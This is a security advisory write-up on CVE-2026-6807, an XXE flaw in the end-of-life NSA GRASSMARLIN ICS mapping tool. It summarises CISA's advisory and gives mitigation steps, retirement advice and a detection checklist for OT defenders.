NSA GRASSMARLIN CVE-2026-6807: XXE Flaw in End-of-Life OT Tool Has No Patch

NSA GRASSMARLIN, an open-source ICS and SCADA network-mapping tool widely used in operational technology environments, carries a newly disclosed XML external entity (XXE) injection vulnerability tracked as CVE-2026-6807. The tool is end-of-life, meaning no patch is coming from the vendor — organizations still running it need to mitigate or retire the software now.

// 01 CVE-2026-6807: What We Know So Far

CISA published ICS Advisory ICSA-26-118-01 on May 1, 2026, detailing the flaw. CVE-2026-6807 is rated medium severity and involves improper handling of XML input within GRASSMARLIN's session and data import functionality. An attacker who can supply crafted XML to the application — through a malicious capture file or a tampered project file — can trigger the XXE condition, potentially disclosing sensitive file contents or internal network information from the analyst's workstation.

GRASSMARLIN is a passive network-mapping tool built for ICS/SCADA environments. It reads PCAP files and Cisco IOS configurations offline to map device relationships without actively probing sensitive OT networks. That offline-analysis design means organizations often deploy it on airgapped or restricted-access analyst machines — machines that may hold highly sensitive network topology data, credentials, or device inventories for critical infrastructure.

The CVSS base score is medium, but the practical risk is higher than that rating suggests. Because GRASSMARLIN is end-of-life with no upstream development, there is no patch and no scheduled fix. Any organization still using GRASSMARLIN must treat this as a permanent unpatched vulnerability and either retire the tool or implement strict compensating controls.

No public proof-of-concept code has been released as of writing. ICSA-26-118-01 notes that a relatively low skill level is required to exploit this class of vulnerability once an attacker can craft or deliver a malicious input file.

// 02 Why CVE-2026-6807 Matters for OT Defenders

OT network analysts typically load GRASSMARLIN with PCAP captures from production ICS networks — captures that contain complete visibility into device-to-device communications, protocol behavior, and engineering workstation traffic. An XXE disclosure from a GRASSMARLIN session could expose that intelligence to any attacker capable of planting a malicious project or capture file.

ICS attack chains frequently begin with compromise of IT-side systems that then reach analyst workstations. If an analyst opens a GRASSMARLIN project file sourced from a compromised share or email attachment, the XXE condition executes silently during import.

The wider concern is tool sprawl in OT security operations. GRASSMARLIN was a well-regarded passive mapping tool and many teams adopted it years ago without a formal decommission plan. The combination of end-of-life status, no patch path, and continued deployment in sensitive environments makes CVE-2026-6807 an urgent housekeeping item for any SOC team that touches OT infrastructure.

// 03 CVE-2026-6807: What You Should Do Now

• Audit GRASSMARLIN deployments immediately. Inventory every workstation running GRASSMARLIN across your OT, IT, and security operations environments. Check installed versions and whether the tool is still in active use.
• Retire GRASSMARLIN where possible. CISA recommends migrating to maintained alternatives. Passive OT network visibility can be achieved through supported tools such as Claroty, Dragos, or Nozomi Networks — all under active development.
• If retirement is not immediately possible, isolate GRASSMARLIN workstations. Restrict network access to the minimum required. Enforce a policy that only verified, internally-generated PCAP files are loaded — never open project files from untrusted sources.
• Block outbound connections from GRASSMARLIN hosts. XXE exploitation can attempt to reach attacker-controlled servers. Firewall rules denying all outbound HTTP/HTTPS from the analyst workstation reduce the impact of successful exploitation.
• Track the advisory in your vulnerability management platform. Ensure ICSA-26-118-01 is assigned to an owner with a formal remediation or retirement deadline.

// 04 Detection and Verification Checklist

• Confirm GRASSMARLIN install status: check %ProgramFiles%, %ProgramData%, and analyst desktop directories on all OT-adjacent Windows workstations.
• Verify no automated jobs are feeding GRASSMARLIN from live capture infrastructure.
• Review logs for any outbound DNS or HTTP requests from hosts where GRASSMARLIN is installed — these may indicate prior XXE exploitation attempts.
• Check whether GRASSMARLIN project files are stored in shared locations accessible from less-trusted network segments.
• Reference CISA ICS Advisory ICSA-26-118-01 directly and assign a formal decommission date.

— Sources: SecurityWeek – In Other News, WindowsForum – CVE-2026-6807 Overview